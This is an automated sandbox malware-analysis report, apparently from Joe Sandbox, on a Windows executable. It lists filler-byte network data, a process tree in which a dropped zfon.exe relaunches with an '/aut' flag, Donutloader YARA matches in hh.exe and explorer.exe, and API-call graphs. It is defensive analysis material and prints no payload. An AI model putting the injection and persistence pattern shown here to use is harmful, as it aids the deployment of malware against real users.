                                                                                              2024-12-18 12:06:10 UTC16384INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa 0a 7b 70 20 00 00 00 00 00 e4 ff da 08 aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                              Data Ascii: {p
                                                                                              2024-12-18 12:06:10 UTC1024INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                              Data Ascii:
                                                                                              2024-12-18 12:06:10 UTC16384INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                              Data Ascii:
                                                                                              2024-12-18 12:06:10 UTC1024INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                              Data Ascii:
                                                                                              2024-12-18 12:06:10 UTC16384INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                              Data Ascii:
                                                                                              2024-12-18 12:06:10 UTC1024INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                              Data Ascii:


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:07:05:38
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\VJQyKuHEUe.exe"
                                                                                              Imagebase:0x500000
                                                                                              File size:185'744 bytes
                                                                                              MD5 hash:703274FA7A3FEBB125CE7EA741A2D546
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:07:06:17
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.2529216553.000001AB8875C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:07:06:17
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000003.2529019018.000002DC4A449000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.2604535605.000002DC4BEE7000.00000008.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:07:06:17
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\hh.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\windows\hh.exe
                                                                                              Imagebase:0x7ff607f60000
                                                                                              File size:18'432 bytes
                                                                                              MD5 hash:2C8FE78D53C8CA27523A71DFD2938241
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.4591031165.000001CDCB5B0000.00000020.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:10
                                                                                              Start time:07:06:19
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 2000 -s 456
                                                                                              Imagebase:0x7ff717de0000
                                                                                              File size:570'736 bytes
                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:07:06:20
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                              Imagebase:0x7ff674740000
                                                                                              File size:5'141'208 bytes
                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000000.2552109850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.2582901850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:13
                                                                                              Start time:07:06:23
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 2000 -s 92
                                                                                              Imagebase:0x7ff717de0000
                                                                                              File size:570'736 bytes
                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:07:06:23
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:explorer.exe
                                                                                              Imagebase:0x7ff674740000
                                                                                              File size:5'141'208 bytes
                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:26
                                                                                              Start time:07:06:45
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:27
                                                                                              Start time:07:06:46
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:28
                                                                                              Start time:07:07:01
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:29
                                                                                              Start time:07:07:01
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:30
                                                                                              Start time:07:08:00
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:31
                                                                                              Start time:07:08:00
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:34
                                                                                              Start time:07:09:01
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:35
                                                                                              Start time:07:09:03
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:8.2%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:123
                                                                                                Total number of Limit Nodes:9
                                                                                                execution_graph 17646 275d460 17647 275d464 17646->17647 17651 275d640 17647->17651 17654 275d62f 17647->17654 17648 275d593 17657 275cf78 17651->17657 17655 275d66e 17654->17655 17656 275cf78 DuplicateHandle 17654->17656 17655->17648 17656->17655 17658 275d6a8 DuplicateHandle 17657->17658 17660 275d66e 17658->17660 17660->17648 17661 9370040 PostMessageW 17662 93700ac 17661->17662 17536 27571f8 17539 2755c74 17536->17539 17538 2757205 17540 2755c7f 17539->17540 17543 2755c94 17540->17543 17542 27572a5 17542->17538 17544 2755c9f 17543->17544 17547 2755cc4 17544->17547 17546 2757382 17546->17542 17548 2755ccf 17547->17548 17551 2755cf4 17548->17551 17550 2757485 17550->17546 17552 2755cff 17551->17552 17560 2758464 17552->17560 17554 2758800 17555 27589eb 17554->17555 17565 275b0a1 17554->17565 17556 2758a29 17555->17556 17569 275d189 17555->17569 17574 275d198 17555->17574 17556->17550 17561 275846f 17560->17561 17562 2759c7a 17561->17562 17579 2759cd8 17561->17579 17583 2759cc8 17561->17583 17562->17554 17587 275b0d8 17565->17587 17591 275b0c9 17565->17591 17566 275b0b6 17566->17555 17571 275d19b 17569->17571 17570 275d1dd 17570->17556 17571->17570 17630 275d348 17571->17630 17634 275d338 17571->17634 17575 275d1b9 17574->17575 17576 275d1dd 17575->17576 17577 275d348 6 API calls 17575->17577 17578 275d338 6 API calls 17575->17578 17576->17556 17577->17576 17578->17576 17580 2759d1b 17579->17580 17581 2759d26 KiUserCallbackDispatcher 17580->17581 17582 2759d50 17580->17582 17581->17582 17582->17562 17584 2759d1b 17583->17584 17585 2759d26 KiUserCallbackDispatcher 17584->17585 17586 2759d50 17584->17586 17585->17586 17586->17562 17596 275b1d0 17587->17596 17606 275b1bf 17587->17606 17588 275b0e7 17588->17566 17592 275b0d8 17591->17592 17594 275b1d0 3 API calls 17592->17594 17595 275b1bf 3 API calls 17592->17595 17593 275b0e7 17593->17566 17594->17593 17595->17593 17597 275b1e1 17596->17597 17600 275b204 17596->17600 17616 275ab94 17597->17616 17600->17588 17601 275b1fc 17601->17600 17602 275b408 GetModuleHandleW 17601->17602 17603 275b435 17602->17603 17603->17588 17607 275b1d0 17606->17607 17608 275ab94 GetModuleHandleW 17607->17608 17610 275b204 17607->17610 17609 275b1ec 17608->17609 17609->17610 17614 275b459 2 API calls 17609->17614 17615 275b468 GetModuleHandleW 17609->17615 17610->17588 17611 275b1fc 17611->17610 17612 275b408 GetModuleHandleW 17611->17612 17613 275b435 17612->17613 17613->17588 17614->17611 17615->17611 17617 275b3c0 GetModuleHandleW 17616->17617 17619 275b1ec 17617->17619 17619->17600 17620 275b459 17619->17620 17627 275b468 17619->17627 17621 275b403 GetModuleHandleW 17620->17621 17622 275b462 17620->17622 17624 275b435 17621->17624 17625 275ab94 GetModuleHandleW 17622->17625 17626 275b47c 17622->17626 17624->17601 17625->17626 17626->17601 17628 275ab94 GetModuleHandleW 17627->17628 17629 275b47c 17628->17629 17629->17601 17631 275d355 17630->17631 17633 275d38f 17631->17633 17638 275ceb0 17631->17638 17633->17570 17635 275d34b 17634->17635 17636 275ceb0 6 API calls 17635->17636 17637 275d38f 17635->17637 17636->17637 17637->17570 17639 275cebb 17638->17639 17641 275dca0 17639->17641 17642 275cfdc 17639->17642 17641->17641 17643 275cfe7 17642->17643 17644 2755cf4 6 API calls 17643->17644 17645 275dd0f 17644->17645 17645->17641 17663 2750848 17666 2750877 17663->17666 17667 27508c5 17666->17667 17671 27508f9 17667->17671 17675 2750908 17667->17675 17672 2750931 17671->17672 17679 27547a1 17672->17679 17673 275094b 17676 2750931 17675->17676 17678 27547a1 CreateActCtxA 17676->17678 17677 275094b 17677->17677 17678->17677 17680 27547d5 17679->17680 17681 27547db 17679->17681 17680->17681 17683 27549d1 17680->17683 17681->17673 17684 27549f5 17683->17684 17688 2754ad1 17684->17688 17692 2754ae0 17684->17692 17690 2754ae3 17688->17690 17689 2754be4 17689->17689 17690->17689 17696 2754704 17690->17696 17694 2754b07 17692->17694 17693 2754be4 17693->17693 17694->17693 17695 2754704 CreateActCtxA 17694->17695 17695->17693 17697 2755f70 CreateActCtxA 17696->17697 17699 2756033 17697->17699 17699->17699

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 357 275b1d0-275b1df 358 275b1e1-275b1ee call 275ab94 357->358 359 275b20b-275b20f 357->359 365 275b204 358->365 366 275b1f0 358->366 361 275b211-275b21b 359->361 362 275b223-275b264 359->362 361->362 368 275b266-275b26e 362->368 369 275b271-275b27f 362->369 365->359 413 275b1f6 call 275b459 366->413 414 275b1f6 call 275b468 366->414 368->369 370 275b281-275b286 369->370 371 275b2a3-275b2a5 369->371 373 275b291 370->373 374 275b288-275b28f call 275aba0 370->374 376 275b2a8-275b2af 371->376 372 275b1fc-275b1fe 372->365 375 275b340-275b400 372->375 378 275b293-275b2a1 373->378 374->378 408 275b402-275b405 375->408 409 275b408-275b433 GetModuleHandleW 375->409 379 275b2b1-275b2b9 376->379 380 275b2bc-275b2c3 376->380 378->376 379->380 383 275b2c5-275b2cd 380->383 384 275b2d0-275b2d9 call 275abb0 380->384 383->384 388 275b2e6-275b2eb 384->388 389 275b2db-275b2e3 384->389 390 275b2ed-275b2f4 388->390 391 275b309-275b316 388->391 389->388 390->391 393 275b2f6-275b306 call 275abc0 call 275abd0 390->393 398 275b339-275b33f 391->398 399 275b318-275b336 391->399 393->391 399->398 408->409 410 275b435-275b43b 409->410 411 275b43c-275b450 409->411 410->411 413->372 414->372
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: b2bf3afd7bb9c4dc3f75808d34211c5dbc1b8c60e312194b96338df62a705785
                                                                                                • Instruction ID: abfaa20250672d2efccf037a2bf20ba8be780b03c0fa4c91ffd84564d9c255a8
                                                                                                • Opcode Fuzzy Hash: b2bf3afd7bb9c4dc3f75808d34211c5dbc1b8c60e312194b96338df62a705785
                                                                                                • Instruction Fuzzy Hash: BC712670A00B158FD724DF69D04476ABBF1FF88304F108A2DD85AD7A54D7B4E945CBA0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 415 275b459-275b460 416 275b403-275b433 GetModuleHandleW 415->416 417 275b462-275b464 415->417 423 275b435-275b43b 416->423 424 275b43c-275b450 416->424 419 275b466-275b471 417->419 420 275b4d0-275b51f 417->420 428 275b47c-275b47e 419->428 429 275b477 call 275ab94 419->429 421 275b521-275b546 420->421 422 275b573-275b5c3 420->422 421->422 433 275b548-275b54a 421->433 441 275b5c5-275b5cb 422->441 442 275b5cc-275b5fd 422->442 423->424 431 275b480-275b491 call 275abec 428->431 432 275b4ae-275b4b3 428->432 429->428 444 275b4a5-275b4ac call 275ac04 431->444 445 275b493-275b49c call 275abf8 431->445 435 275b56d-275b570 433->435 436 275b54c-275b556 433->436 435->422 439 275b558 436->439 440 275b55a-275b569 436->440 439->440 440->440 446 275b56b 440->446 441->442 448 275b60d 442->448 449 275b5ff-275b603 442->449 444->432 453 275b4a1-275b4a3 445->453 446->435 456 275b60e 448->456 449->448 452 275b605-275b608 call 275909c 449->452 452->448 453->432 456->456
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0275B1EC), ref: 0275B426
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 0ccc47a795cf6b96abc1f2bfbf6db20756cc07041ba3ee8665439d43a0305870
                                                                                                • Instruction ID: be4286a5d9a499bb5c3f6ffb10197ce456993d540bccd63e545628b32885cb0a
                                                                                                • Opcode Fuzzy Hash: 0ccc47a795cf6b96abc1f2bfbf6db20756cc07041ba3ee8665439d43a0305870
                                                                                                • Instruction Fuzzy Hash: C4518EB1E002688FDB14DF99D8447AEFBF2EF88318F149129E818E7294C7B49845CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 457 2755f64-2755f6d 458 2755f73-2756031 CreateActCtxA 457->458 460 2756033-2756039 458->460 461 275603a-2756094 458->461 460->461 468 2756096-2756099 461->468 469 27560a3-27560a7 461->469 468->469 470 27560a9-27560b5 469->470 471 27560b8 469->471 470->471 473 27560b9 471->473 473->473
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02756021
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: f27f7ab07e69e28505ff10dcfdaa7c910ca8e4ae8080da84b45f4434d1d0e9fa
                                                                                                • Instruction ID: 7a1d197c53be78e33279f6c9383d4571865f192a93752ff66964c0e559b68a15
                                                                                                • Opcode Fuzzy Hash: f27f7ab07e69e28505ff10dcfdaa7c910ca8e4ae8080da84b45f4434d1d0e9fa
                                                                                                • Instruction Fuzzy Hash: 9541E2B0C00619CFDB24DFA9C844B9DFBB6BF49314F20816AD418AB254DBB56946CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 474 2754704-2756031 CreateActCtxA 477 2756033-2756039 474->477 478 275603a-2756094 474->478 477->478 485 2756096-2756099 478->485 486 27560a3-27560a7 478->486 485->486 487 27560a9-27560b5 486->487 488 27560b8 486->488 487->488 490 27560b9 488->490 490->490
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02756021
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 374bd608dc4599ebdb8a8d5c41f11362a84e9473b23c61c6aa332ac89d1c44dc
